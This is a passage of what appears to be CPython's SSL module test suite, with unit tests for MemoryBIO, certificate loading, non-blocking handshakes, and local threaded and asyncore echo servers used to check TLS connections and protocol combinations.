self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_idna_in_server_hostname(self):
# Note: this test is testing some code that probably shouldn't exist
# in the first place, so if it starts failing at some point because
# you made the ssl module stop doing IDNA decoding then please feel
# free to remove it. The test was mainly added because this case used
# to cause memory corruption (see bpo-30594).
ctx = ssl.create_default_context()
with self.assertRaises(UnicodeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="xn--.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple I/O loop. Call func(*args); depending on the error we get
# (WANT_READ or WANT_WRITE), move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
# should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
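# Record the protocols negotiated for this connection so tests can
# inspect them later through the server object.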
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ssl.SSLError, ConnectionResetError, OSError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
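# Hand run() an Event and wait on it, so the context manager does not
# return until the server socket is actually listening.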
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
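# A short accept() timeout lets the loop below re-check self.active
# regularly, so stop() takes effect promptly.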
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
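# select() cannot see data that has already been decrypted and buffered
# inside the SSL object, so drain it before reporting readable.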
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
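# Drive the non-blocking handshake: WANT_READ/WANT_WRITE just mean it is
# not finished yet; EOF or ECONNABORTED closes the channel instead.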
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# getpeercert() raises ValueError while the handshake isn't done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
